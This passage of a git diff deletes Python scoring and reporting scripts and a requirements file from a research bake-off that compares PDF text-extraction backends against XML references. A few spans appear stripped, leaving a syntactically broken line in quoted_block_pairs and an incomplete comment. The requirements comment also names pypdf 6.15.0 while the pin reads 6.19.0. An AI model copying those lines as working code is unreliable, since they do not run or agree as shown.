for m, s2 in report["delta_quoted_block_stratum"].items(): - if s2["point"] is None: - print(f" {m:6} insufficient data") - continue - ci = f"[{s2['ci'][0]:+.4f}, {s2['ci'][1]:+.4f}]" - n = f"{s2['n_documents_differing']}/{s2['n_documents']}" - print(f" {m:6} delta={s2['point']:+.4f} {ci:>20} {n:>7} differ") - - print(f"\nrepair delta on B1 (repaired - strict): {report['repair_delta_B1']}") - - dest = args.out or args.results.with_name(args.results.stem + f"_report_{args.mode}.json") - dest.write_text(json.dumps(report, indent=1)) - print(f"\nwrote {dest}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/report_phase1.py b/docs/research/pdf-backend-bakeoff/probes/report_phase1.py deleted file mode 100644 index 5c6718b1..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/report_phase1.py +++ /dev/null @@ -1,152 +0,0 @@ -"""Summarize Phase 1 results: calibration gate first, then per-backend, then per-bill. - -Reports the calibration gate before any ranking, because if the incumbent does not land -near ceiling through the neutral layer then nothing else in the file means anything. -""" - -from __future__ import annotations - -import argparse -import json -import statistics -from collections import defaultdict -from pathlib import Path - -INCUMBENT = "pdfium-native" - - -def agg(values: list[float]) -> str: - if not values: - return " n/a" - return f"{statistics.mean(values):.4f}" - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--results", type=Path, required=True) - ap.add_argument("--mode", default="both", choices=["strict", "repaired", "both"]) - args = ap.parse_args() - - data = json.loads(args.results.read_text()) - docs = data["documents"] - backends = data["backends"] - modes = ["strict", "repaired"] if args.mode == "both" else [args.mode] - - print(f"N = {len(docs)} documents, {len(backends)} backends\n") - - # ---- Gate 1: did every backend open every document? ---- - print("GATE 1 -- opens the corpus") - for b in backends: - errs = [k for k, v in docs.items() if "error" in v.get(b, {})] - n_ok = sum(1 for v in docs.values() if b in v and "error" not in v[b]) - print(f" {b:<15} {n_ok}/{len(docs)} opened" + (f" FAILURES: {errs}" if errs else "")) - print() - - # ---- Calibration gate (Trap 1) ---- - print("CALIBRATION GATE (Trap 1) -- the incumbent through the neutral layer") - for mode in modes: - f1s = [ - v[INCUMBENT][mode]["text_vs_xml"]["f1"] - for v in docs.values() - if INCUMBENT in v and "error" not in v[INCUMBENT] - ] - cons = [ - v[INCUMBENT][mode]["tree"]["conservation_holds"] - for v in docs.values() - if INCUMBENT in v and "error" not in v[INCUMBENT] - ] - print( - f" {mode:<9} text F1 mean={agg(f1s)} median={statistics.median(f1s):.4f} " - f"min={min(f1s):.4f} max={max(f1s):.4f} | conservation holds {sum(cons)}/{len(cons)}" - ) - print(" (ceiling is set by the PDF-vs-XML format gap, not by 1.0 -- see README)\n") - - # ---- Per-backend aggregate ---- - for mode in modes: - print(f"PER-BACKEND, mode={mode} (N={len(docs)})") - header = ( - f" {'backend':<15} {'textF1':>7} {'ln_recall':>10} {'ln_spur':>8} " - f"{'crumbs':>7} {'consv':>7} {'fontsep':>8} {'emptyfont':>10} {'extract_s':>10}" - ) - print(header) - for b in backends: - rows = [v[b] for v in docs.values() if b in v and "error" not in v[b]] - if not rows: - continue - f1 = [r[mode]["text_vs_xml"]["f1"] for r in rows] - lr = [r[mode]["line_numbers"]["recall"] for r in rows if r[mode]["line_numbers"]["recall"] is not None] - ls = [ - r[mode]["line_numbers"]["spurious_rate"] - for r in rows - if r[mode]["line_numbers"]["spurious_rate"] is not None - ] - bc = [r[mode]["breadcrumbs"]["agreement"] for r in rows if r[mode]["breadcrumbs"]["agreement"] is not None] - cs = [r[mode]["tree"]["conservation_holds"] for r in rows] - fs = [ - r["font_role"]["margin_vs_body_separation"] - for r in rows - if r["font_role"]["margin_vs_body_separation"] is not None - ] - ef = [ - r["font_role"]["empty_font_name_rate"] - for r in rows - if r["font_role"]["empty_font_name_rate"] is not None - ] - ex = [r["extract_s"] for r in rows] - print( - f" {b:<15} {agg(f1):>7} {agg(lr):>10} {agg(ls):>8} {agg(bc):>7} " - f"{sum(cs)}/{len(cs):<5} {agg(fs):>8} {agg(ef):>10} {sum(ex):>9.1f}" - ) - print() - - # ---- Strict vs repaired gap: the glyph-naming deficit ---- - print("GLYPH-NAMING DEFICIT (repaired F1 - strict F1; >0 means the backend could not") - print("name a glyph the position rule then recovered)") - for b in backends: - rows = [v[b] for v in docs.values() if b in v and "error" not in v[b]] - gaps = [r["repaired"]["text_vs_xml"]["f1"] - r["strict"]["text_vs_xml"]["f1"] for r in rows] - unnamed = [r["strict"]["reconstruction"]["unnamed_glyphs"] for r in rows] - n_affected = sum(1 for g in gaps if g > 1e-9) - print( - f" {b:<15} mean_gap={statistics.mean(gaps):+.4f} max_gap={max(gaps):+.4f} " - f"docs_affected={n_affected}/{len(gaps)} unnamed_glyphs={sum(unnamed)}" - ) - print() - - # ---- LCS cross-check: does the multiset substitution change anything? ---- - deltas = [] - for v in docs.values(): - for b in backends: - r = v.get(b, {}) - if "error" in r: - continue - for mode in ("strict", "repaired"): - lcs = r[mode].get("text_vs_xml_lcs") - if lcs: - deltas.append(abs(lcs["f1"] - r[mode]["text_vs_xml"]["f1"])) - if deltas: - print("METRIC AUDIT -- multiset F1 vs order-sensitive LCS F1, where both computable") - print( - f" n={len(deltas)} comparisons, mean |delta|={statistics.mean(deltas):.5f}, max |delta|={max(deltas):.5f}" - ) - print() - - # ---- Per-bill, so one bill cannot drive the headline ---- - print("PER-BILL text F1 (repaired), so no single bill drives the aggregate") - by_bill: dict[str, dict[str, list[float]]] = defaultdict(lambda: defaultdict(list)) - for key, v in docs.items(): - bill = key.split("/")[0] - for b in backends: - if b in v and "error" not in v[b]: - by_bill[bill][b].append(v[b]["repaired"]["text_vs_xml"]["f1"]) - print(f" {'bill':<16} {'n':>3} " + " ".join(f"{b[:11]:>11}" for b in backends)) - for bill in sorted(by_bill): - n = max(len(by_bill[bill][b]) for b in backends) - cells = " ".join( - f"{statistics.mean(by_bill[bill][b]):>11.4f}" if by_bill[bill][b] else f"{'n/a':>11}" for b in backends - ) - print(f" {bill:<16} {n:>3} {cells}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/report_phase2.py b/docs/research/pdf-backend-bakeoff/probes/report_phase2.py deleted file mode 100644 index c2b2996b..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/report_phase2.py +++ /dev/null @@ -1,181 +0,0 @@ -"""Summarize Phase 2: the terminal metric, per bill and per backend. - -Reports T4 (backend vs incumbent, PDF side only) most prominently, because it is the -only measurement here in which a difference is unambiguously attributable to the backend. -T1/T2 compare two different artifacts of one bill version, so their disagreement mixes -the three causes Trap 2 names and cannot separate them. -""" - -from __future__ import annotations - -import argparse -import json -import statistics -from collections import defaultdict -from pathlib import Path - -INCUMBENT = "pdfium-native" - - -def mean(xs): - return statistics.mean(xs) if xs else float("nan") - - -def quoted_block_pairs() -> set[str]: - """Pairs whose XML reference is compromised by the known parser drop. - - The parser drops , so on an amendment bill the XML side UNDER-reports - content (tracked as DeltaTrack#11). That makes the XML an unreliable reference on - those pairs, and it fails in a known direction: a PDF-vs-XML disagreement there is - presumptively the XML's, which is Trap 2's cause #2 rather than a backend error. - Detected from the fixture files rather than hardcoded, so the set cannot drift. - """ - import sys as _sys - - _sys.path.insert(0, str(Path(__file__).resolve().parent)) - from score_phase2 import corpus_pairs - - out = set() - for bill, a, b, _p1, _p2, x1, x2 in corpus_pairs(): - if "{b}") - return out - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--results", type=Path, required=True) - ap.add_argument("--mode", default="repaired") - args = ap.parse_args() - - data = json.loads(args.results.read_text()) - pairs = data["pairs"] - backends = data["backends"] - mode = args.mode - - done = {k: v for k, v in pairs.items() if any(f"/{mode}" in s for s in v)} - print(f"N = {len(done)} pairs scored (of {data['n_pairs']}), mode={mode}\n") - - def cell(pair, backend, *keys): - e = pairs[pair].get(f"{backend}/{mode}") - if not e or "error" in e: - return None - for k in keys: - e = e.get(k) if isinstance(e, dict) else None - if e is None: - return None - return e - - # ---- T4 first: the sharp instrument ---- - print("T4 -- BACKEND vs INCUMBENT, PDF side only (downstream pipeline held fixed,") - print(" so any difference is attributable to the backend, no adjudication needed)") - print(f" {'backend':<15} {'amounts identical':>18} {'changes identical':>18} {'amount F1':>10} {'change F1':>10}") - for b in backends: - if b == INCUMBENT: - print(f" {b:<15} {'(reference)':>18} {'(reference)':>18} {'-':>10} {'-':>10}") - continue - ai = [cell(p, b, "T4_vs_incumbent", "identical_amounts") for p in done] - ci = [cell(p, b, "T4_vs_incumbent", "identical_changes") for p in done] - af = [cell(p, b, "T4_vs_incumbent", "amount_entries", "f1") for p in done] - cf = [cell(p, b, "T4_vs_incumbent", "change_signatures", "f1") for p in done] - ai = [x for x in ai if x is not None] - ci = [x for x in ci if x is not None] - af = [x for x in af if x is not None] - cf = [x for x in cf if x is not None] - print( - f" {b:<15} {f'{sum(ai)}/{len(ai)}':>18} {f'{sum(ci)}/{len(ci)}':>18} {mean(af):>10.4f} {mean(cf):>10.4f}" - ) - print() - - # ---- T2: money agreement vs XML, the structure-free oracle ---- - # - # STRATIFIED, because an unstratified mean here is misleading in both directions. - # Three populations are mixed together: - # * pairs where BOTH sides found zero amount entries -- F1 is trivially 1.0 and - # carries no information; - # * pairs where the XML found zero and the PDF found some -- F1 is 0.0 by empty - # denominator, which is not a backend failure; - # * pairs with a real amount population on both sides -- the only informative ones. - # A single mean over all three is dominated by which degenerate cases happen to be in - # the corpus. - qb = quoted_block_pairs() - print("T2 -- amount_entries agreement vs the XML pipeline (structure-free), STRATIFIED") - - def strat(p, b): - e = cell(p, b, "T2_amount_entries", "f1") - n_ref = cell(p, b, "T2_amount_entries", "n_reference") - n_cand = cell(p, b, "T2_amount_entries", "n_candidate") - if e is None: - return None, None - if not n_ref and not n_cand: - return "empty_both", e - if not n_ref: - return "xml_found_none", e - return ("substantive_qb" if p in qb else "substantive_clean"), e - - for label in ("substantive_clean", "substantive_qb", "xml_found_none", "empty_both"): - pairs_in = [p for p in done if strat(p, INCUMBENT)[0] == label] - if not pairs_in: - continue - note = { - "substantive_clean": "real amounts, XML reference SOUND -- the informative population", - "substantive_qb": "real amounts, XML reference carries (known parser drop)", - "xml_found_none": "XML found no amount entries; F1 is an empty-denominator artifact", - "empty_both": "neither side found amounts; F1 trivially 1.0, carries no information", - }[label] - print(f"\n [{label}] n={len(pairs_in)} -- {note}") - print(f" {'backend':<15} {'meanF1':>8} {'minF1':>8} {'perfect':>9}") - for b in backends: - f1 = [x for x in (cell(p, b, "T2_amount_entries", "f1") for p in pairs_in) if x is not None] - if not f1: - continue - print(f" {b:<15} {mean(f1):>8.4f} {min(f1):>8.4f} {f'{sum(1 for x in f1 if x == 1.0)}/{len(f1)}':>9}") - print() - - # ---- T1: change signatures, reported as CONTEXT not as a score ---- - print("T1 -- change-signature agreement vs XML. Reported as CONTEXT, not as a score:") - print(" the two pipelines segment provisions differently by design (blocks vs") - print(" elements), so this number measures the format gap, not the backend.") - print(f" {'backend':<15} {'meanF1':>8} {'mean n_changes pdf':>20} {'xml':>8}") - for b in backends: - f1 = [x for x in (cell(p, b, "T1_change_signatures", "f1") for p in done) if x is not None] - np_ = [x for x in (cell(p, b, "context", "n_changes_pdf") for p in done) if x is not None] - nx = [x for x in (cell(p, b, "context", "n_changes_xml") for p in done) if x is not None] - if not f1: - continue - print(f" {b:<15} {mean(f1):>8.4f} {mean(np_):>20.0f} {mean(nx):>8.0f}") - print() - - # ---- per bill ---- - print("PER-BILL amount_entries F1 vs XML (repaired), so no bill drives the headline") - by_bill: dict[str, dict[str, list[float]]] = defaultdict(lambda: defaultdict(list)) - for p in done: - bill = p.split("/")[0] - for b in backends: - v = cell(p, b, "T2_amount_entries", "f1") - if v is not None: - by_bill[bill][b].append(v) - print(f" {'bill':<16} {'n':>2} " + " ".join(f"{b[:11]:>11}" for b in backends)) - for bill in sorted(by_bill): - n = max(len(by_bill[bill][b]) for b in backends) - cells = " ".join(f"{mean(by_bill[bill][b]):>11.4f}" if by_bill[bill][b] else f"{'n/a':>11}" for b in backends) - print(f" {bill:<16} {n:>2} {cells}") - print() - - # ---- amount disagreements vs the incumbent, listed for adjudication ---- - print("GATE 5 candidates -- pairs where a backend's amount_entries differ from the") - print("incumbent's. Held-fixed pipeline, so each is a real backend difference.") - any_found = False - for b in backends: - if b == INCUMBENT: - continue - bad = [p for p in done if cell(p, b, "T4_vs_incumbent", "identical_amounts") is False] - if bad: - any_found = True - print(f" {b}: {len(bad)} pair(s) -- {bad}") - if not any_found: - print(" none") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/requirements.txt b/docs/research/pdf-backend-bakeoff/probes/requirements.txt deleted file mode 100644 index 0c779c05..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/requirements.txt +++ /dev/null @@ -1,29 +0,0 @@ -# Benchmark-only dependencies for the PDF backend bake-off. -# -# DELIBERATELY NOT IN pyproject.toml. These are candidates under test, not product -# dependencies, and one of them (PyMuPDF) is AGPL-3.0 and must never reach the -# distributed dependency set -- it is present as a CEILING REFERENCE only, per the -# project distribution policy recorded in ../LICENSING.md. -# -# Pinned to the versions the published numbers were produced with. Several results are -# version-sensitive (pdfminer.six's LTChar geometry, PyMuPDF's rawdict shape), so a -# re-run on different versions may legitimately differ and should say so. -# -# ONE EXCEPTION, and it is deliberate: pypdf is 6.15.0 below, while every published pypdf -# number was produced on 6.14.2 -- which is what README.md's version table still records, -# correctly, because that table is a statement about history. 6.14.2 carries two moderate -# advisories (GHSA-fp3f-mc75-235c, GHSA-fwg2-594c-jp42; both resource exhaustion on hostile -# input, both fixed in 6.15.0), so the pin moved for SECURITY. Nothing was re-run and no -# published number changed. -# -# So do not "correct" that table to match this pin. A re-run today does not reproduce the -# pypdf column on the version that produced it, and any pypdf difference should be -# attributed to that before anything else. -# -# Install: -# uv pip install --python .venv/bin/python -r docs/research/pdf-backend-bakeoff/probes/requirements.txt - -pdfminer.six==20260107 -pypdf==6.19.0 -pymupdf==1.28.0 # AGPL-3.0 -- ceiling reference only, never shippable -playwright==1.60.0 # egress harness; also needs: python -m playwright install chromium diff --git a/docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py b/docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py deleted file mode 100644 index 03fba473..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py +++ /dev/null @@ -1,219 +0,0 @@ -"""Concern B scoring for the confirmatory run, over one frozen population at a time. - -PRE-REGISTRATION-CONFIRMATORY.md. Emits per-document, per-backend, per-mode B1/B2/B3a/B5/B6 -plus the B0 sabotage rows, into one raw JSON file per population. Computes no statistics and -draws no conclusion -- report_confirmatory.py does that from this output. - - --population p1 the 52-document replication corpus (tests/corpus) - --population p2 the holdout, read from results/holdout_membership.json - -Two candidates plus the incumbent are extracted (pdfium-native is carried for Concern A and -for the strict/repaired repair-delta, never as a Concern B reference). Sabotage variants -reuse the base backend's already-extracted glyphs, so B0 costs reconstruction, not extraction. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py \ - --population p1 --out docs/research/pdf-backend-bakeoff/results/confirm_p1.json -""" - -from __future__ import annotations - -import argparse -import json -import sys -import time -import traceback -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import confirm_sabotage as SAB # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase1 import ( # noqa: E402 - align_to_body, - corpus_documents, - normalize_for_text_compare, - token_f1, - xml_body_tokens, -) - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 - -CANDIDATES = ("pdfium-wasm", "pdfminer") -SABOTAGE_BASE = "pdfium-wasm" -EXTRACT = ("pdfium-native",) + CANDIDATES -MODES = ("strict", "repaired") - - -def p2_documents(membership: Path) -> list[tuple[str, int, Path, Path]]: - """The 44 holdout documents named by the frozen membership. - - The holdout files are fetched rather than committed (`probes/fetch_holdout.py`), so a - tree where nobody has run the fetcher is the ORDINARY state, not an exotic one. This - used to skip any document whose files were absent, which meant that tree scored zero - documents, wrote a well-formed results file and exited 0 -- a vacuous pass in the exact - place the confirmatory run's holdout arm lives. Missing files now raise. - """ - doc = json.loads(membership.read_text()) - root = REPO / "docs/research/pdf-backend-bakeoff/holdout" - out, missing = [], [] - for m in doc["members"]: - for v in m["versions"]: - pdf = root / m["bill_id"] / Path(v["pdf"]["path"]).name - xml = root / m["bill_id"] / Path(v["xml"]["path"]).name - missing.extend(str(p.relative_to(root)) for p in (pdf, xml) if not p.exists()) - out.append((m["bill_id"], v["index"], pdf, xml)) - if missing: - raise SystemExit( - f"{len(missing)} of {2 * len(out)} holdout files are missing, so the P2 population " - f"cannot be scored. Restore them first:\n" - f" .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py\n" - f"first missing: {', '.join(missing[:4])}" - ) - expected = doc["n_documents"] - if len(out) != expected: - raise SystemExit(f"membership names {len(out)} documents, its own n_documents says {expected}") - return out - - -def score_pages(pages, xml_tokens, ref, scored_pages) -> dict: - tokens = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, align_info = align_to_body(xml_tokens, tokens) - pdf_struct = M.pdf_structure(pages) - return { - "B1": token_f1(xml_tokens, aligned), - "B2": M.b2_heading_labels(pdf_struct, ref), - "B3a": M.b3a_line_number_self_consistency(pages, scored_pages), - "B5": M.b5_amount_association(pdf_struct, ref), - "B6": M.b6_parent_child(pdf_struct, ref), - "alignment": align_info, - "n_anchors": pdf_struct["n_anchors"], - "n_pages": len(pages), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--population", choices=("p1", "p2"), required=True) - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--limit-docs", type=int, default=None) - args = ap.parse_args() - - if args.population == "p1": - docs = corpus_documents() - else: - docs = p2_documents(REPO / "docs/research/pdf-backend-bakeoff/results/holdout_membership.json") - if args.limit_docs: - docs = docs[: args.limit_docs] - print(f"population {args.population}: {len(docs)} documents", file=sys.stderr) - - out: dict = { - "population": args.population, - "n_documents": len(docs), - "candidates": list(CANDIDATES), - "sabotage_base": SABOTAGE_BASE, - "seed": SAB.SEED, - "documents": {}, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - entry: dict = { - "bill": bill, - "version": version, - "pdf": str(pdf.relative_to(REPO)) if pdf.is_relative_to(REPO) else str(pdf), - } - t0 = time.perf_counter() - try: - xml_tokens = xml_body_tokens(xml) - ref = M.xml_reference(xml) - entry["quoted_block"] = M.xml_has_quoted_block(xml) - entry["xml_headings"] = len(ref["labels"]) - entry["xml_amounts"] = sum(ref["amounts"].values()) - except Exception as exc: - entry["error"] = f"xml: {type(exc).__name__}: {exc}" - out["documents"][key] = entry - print(f" [{i}/{len(docs)}] {key:<28} XML ERROR {exc}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - continue - - raw: dict = {} - for b in EXTRACT: - try: - raw[b] = run_backend(b, pdf)[0] - except Exception as exc: - entry.setdefault("backend_errors", {})[b] = f"{type(exc).__name__}: {exc}" - print(f" {b} EXTRACT ERROR: {exc}", file=sys.stderr) - - # Sabotage variants derive from one candidate's glyphs, no re-extraction. - variants: dict = {b: raw[b] for b in raw} - if SABOTAGE_BASE in raw: - for sid, (fn, _metric) in SAB.B_SABOTAGES.items(): - try: - variants[sid] = fn(raw[SABOTAGE_BASE]) - except Exception as exc: - entry.setdefault("sabotage_errors", {})[sid] = f"{type(exc).__name__}: {exc}" - print(f" {sid} SABOTAGE ERROR: {exc}", file=sys.stderr) - - # Reconstruct everything first: B3a's page set is the UNION of pages any variant - # could number, so no backend is scored on a page nobody can number, and a page one - # backend CAN number counts against those that cannot. - recon: dict = {} - for name, pages_raw in variants.items(): - for mode in MODES: - try: - recon[(name, mode)] = reconstruct(pages_raw, repaired=(mode == "repaired"))[0] - except Exception as exc: - entry.setdefault("reconstruct_errors", {})[f"{name}/{mode}"] = str(exc) - - # Union over the REAL backends only. Including sabotage variants lets a control - # change the population it is controlling: S4 moves heading glyphs between pages, - # which added pages to the union and moved the untouched base backend's B3a from - # 1.0000 to 0.9891 without anything about that backend having changed. - union_pages = { - mode: set().union( - *[M.numbered_pages(pg) for (n, m), pg in recon.items() if m == mode and n in raw] or [set()] - ) - for mode in MODES - } - - results: dict = {} - for name in variants: - per_mode = {} - for mode in MODES: - pages = recon.get((name, mode)) - if pages is None: - continue - try: - per_mode[mode] = score_pages(pages, xml_tokens, ref, union_pages[mode]) - except Exception as exc: - per_mode[mode] = { - "error": f"{type(exc).__name__}: {exc}", - "traceback": traceback.format_exc()[-800:], - } - if name in raw: - pages = recon.get((name, "repaired")) - per_mode["production_accepted"] = (not _is_unnumbered_layout(pages)) if pages else None - results[name] = per_mode - entry["results"] = results - entry["elapsed_s"] = round(time.perf_counter() - t0, 2) - - out["documents"][key] = entry - args.out.write_text(json.dumps(out, indent=1, default=str)) - b1 = { - n: results[n].get("strict", {}).get("B1", {}).get("f1") for n in ("pdfium-wasm", "pdfminer") if n in results - } - print(f" [{i}/{len(docs)}] {key:<28} {entry['elapsed_s']:>6.1f}s B1(strict)={b1}", file=sys.stderr) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/score_hybrid.py deleted file mode 100644 index 5f272b19..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_hybrid.py +++ /dev/null @@ -1,281 +0,0 @@ -"""Does the hybrid indexed-text+geometry path reproduce PRODUCTION, and is it accurate? - -Two references, kept apart, because they answer different questions and a single number -would let one hide the other: - - vs PRODUCTION (`parsers/pdf_text.extract_clean_pages`) -- MIGRATION parity. Answers - "would moving the PDF adapter to this contract change what a staffer sees today?" - Reproducing production exactly is evidence about risk, never about correctness. - - vs XML -- ACCURACY. Answers "is the agreement above agreement on the right answer?" - Without this, a path that reproduced production's mistakes would score perfectly. - -Paths scored, all through the SAME downstream engine (`extract_anchors`, -`_pdf_tree_payload`, `diff_pdfs`, `pdf_diff_to_canonical`): - - production PDFium text API + the string pipeline (what ships today) - glyph PDFium glyph geometry + neutral reconstruction (the bake-off's seam) - hybrid PDFium indexed char stream + per-index geometry (the layer under test) - pdfminer pdfminer.six glyph geometry + neutral reconstruction (the neutral control) - -Per-document metrics, all named in the request: - - H1 full normalized text identity, then token F1 when it is not identical - H2 heading labels exact set match, and the two error directions - H3 heading tree / breadcrumbs heading -> parent-heading map agreement - H4 line numbers exact (page, line-number) set identity - H5 amount -> heading association agreement over the shared amount multiset - H6 canonical diff amount and change signatures, per pair (see --pairs) - -Production code is imported, never modified. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_hybrid.py \ - --out docs/research/pdf-backend-bakeoff/results/hybrid_docs.json - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_hybrid.py --pairs \ - --out docs/research/pdf-backend-bakeoff/results/hybrid_pairs.json -""" - -from __future__ import annotations - -import argparse -import hashlib -import json -import sys -import time -import traceback -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct as reconstruct_glyph # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 -from score_phase2 import amount_triples, change_signatures, corpus_pairs # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import pdf_diff_to_canonical # noqa: E402 -from deltatrack.parsers.pdf_text import extract_clean_pages, pdf_full_text # noqa: E402 - -PATHS = ("production", "glyph", "hybrid", "pdfminer") - - -def build_pages(path: str, pdf: Path): - if path == "production": - return extract_clean_pages(pdf), {} - if path == "hybrid": - raw, summary = pdfium_hybrid.extract(pdf) - pages, diag = RH.reconstruct(raw) - return pages, {**summary, **diag} - backend = "pdfium-native" if path == "glyph" else "pdfminer" - raw, summary = run_backend(backend, pdf) - pages, diag = reconstruct_glyph(raw, repaired=True) - return pages, {**summary, **diag} - - -def _tokens(text: str) -> list[str]: - return text.split() - - -def _token_f1(a: list[str], b: list[str]) -> float: - """Bag-of-tokens F1. Order-insensitive on purpose: H1 asks whether the same WORDS were - recovered. Ordering is H4's and H6's business, and a sequence matcher on a 180k-token - enrolled bill costs more than the answer is worth.""" - ca, cb = Counter(a), Counter(b) - hit = sum((ca & cb).values()) - if not hit: - return 0.0 - p, r = hit / max(len(b), 1), hit / max(len(a), 1) - return round(2 * p * r / (p + r), 5) - - -def doc_facts(pages) -> dict: - text, _ = pdf_full_text(pages) - return { - "text": text, - "text_sha256": hashlib.sha256(text.encode()).hexdigest(), - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None - ), - "structure": M.pdf_structure(pages), - "declined": _is_unnumbered_layout(pages), - } - - -def compare_to(cand: dict, ref: dict) -> dict: - """Every H-metric of one path against one reference path.""" - c_lab, r_lab = cand["structure"]["labels"], ref["structure"]["labels"] - c_par, r_par = cand["structure"]["parent"], ref["structure"]["parent"] - shared = c_lab & r_lab - par_agree = sum(1 for lab in shared if c_par.get(lab, "") == r_par.get(lab, "")) - - shared_amt = set(cand["structure"]["amounts"] & ref["structure"]["amounts"]) - ca = Counter({k: v for k, v in cand["structure"]["assoc"].items() if k[0] in shared_amt}) - ra = Counter({k: v for k, v in ref["structure"]["assoc"].items() if k[0] in shared_amt}) - assoc_hit = sum((ca & ra).values()) - - return { - "H1_text_identical": cand["text_sha256"] == ref["text_sha256"], - "H1_token_f1": _token_f1(_tokens(ref["text"]), _tokens(cand["text"])), - "H2_labels_exact": c_lab == r_lab, - "H2_labels_reference": len(r_lab), - "H2_labels_candidate": len(c_lab), - "H2_absent_from_reference": len(c_lab - r_lab), - "H2_missed_from_reference": len(r_lab - c_lab), - "H2_sample_absent": sorted(c_lab - r_lab)[:5], - "H3_breadcrumb_shared": len(shared), - "H3_breadcrumb_agree": par_agree, - "H3_breadcrumb_accuracy": round(par_agree / len(shared), 5) if shared else None, - "H4_line_numbers_identical": cand["line_numbers"] == ref["line_numbers"], - "H4_line_numbers_reference": len(ref["line_numbers"]), - "H4_line_numbers_candidate": len(cand["line_numbers"]), - "H4_line_numbers_jaccard": ( - round( - len(set(cand["line_numbers"]) & set(ref["line_numbers"])) - / len(set(cand["line_numbers"]) | set(ref["line_numbers"])), - 5, - ) - if (cand["line_numbers"] or ref["line_numbers"]) - else None - ), - "H5_assoc_reference": sum(ra.values()), - "H5_assoc_agree": assoc_hit, - "H5_assoc_accuracy": round(assoc_hit / sum(ra.values()), 5) if sum(ra.values()) else None, - } - - -def score_documents(out_path: Path, limit: int | None) -> None: - docs = corpus_documents() - if limit: - docs = docs[:limit] - rows = [] - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - t0 = time.perf_counter() - entry: dict = {"doc": key, "quoted_block": M.xml_has_quoted_block(xml)} - facts: dict = {} - for path in PATHS: - try: - pages, summary = build_pages(path, pdf) - facts[path] = doc_facts(pages) - entry.setdefault("extract", {})[path] = summary - except Exception as exc: # noqa: BLE001 - entry.setdefault("errors", {})[path] = f"{type(exc).__name__}: {exc}" - print(traceback.format_exc()[-800:], file=sys.stderr) - if "production" in facts: - entry["production_declined"] = facts["production"]["declined"] - entry["vs_production"] = { - p: compare_to(facts[p], facts["production"]) for p in PATHS if p != "production" and p in facts - } - try: - ref = M.xml_reference(xml) - entry["vs_xml"] = { - p: { - "B2": M.b2_heading_labels(facts[p]["structure"], ref), - "B5": M.b5_amount_association(facts[p]["structure"], ref), - "B6": M.b6_parent_child(facts[p]["structure"], ref), - } - for p in PATHS - if p in facts - } - except Exception as exc: # noqa: BLE001 - entry.setdefault("errors", {})["xml"] = f"{type(exc).__name__}: {exc}" - entry["elapsed_s"] = round(time.perf_counter() - t0, 1) - rows.append(entry) - _progress(i, len(docs), key, entry) - out_path.parent.mkdir(parents=True, exist_ok=True) - out_path.write_text(json.dumps({"documents": rows}, indent=1)) - print(f"\nwrote {out_path}") - - -def _progress(i: int, n: int, key: str, entry: dict) -> None: - bits = [] - for p, r in (entry.get("vs_production") or {}).items(): - txt = "=" if r["H1_text_identical"] else "x" - bits.append(f"{p}: txt={txt} lab+{r['H2_absent_from_reference']}/-{r['H2_missed_from_reference']}") - print(f" [{i}/{n}] {key:<28} {' '.join(bits)} ({entry['elapsed_s']}s)", file=sys.stderr) - - -def score_pairs(out_path: Path, limit: int | None) -> None: - """H6 -- the canonical diff, the product's actual output.""" - pairs = corpus_pairs() - if limit: - pairs = pairs[:limit] - rows = [] - for i, pair in enumerate(pairs, 1): - bill, v1, v2, pdf1, pdf2 = pair[0], pair[1], pair[2], pair[3], pair[4] - key = f"{bill}/{v1}->{v2}" - entry: dict = {"pair": key} - canon: dict = {} - for path in PATHS: - try: - p1, _ = build_pages(path, pdf1) - p2, _ = build_pages(path, pdf2) - entry.setdefault("declined", {})[path] = [ - s for s, pg in (("v1", p1), ("v2", p2)) if _is_unnumbered_layout(pg) - ] - congress, chamber, number = bill.split("-", 2) - 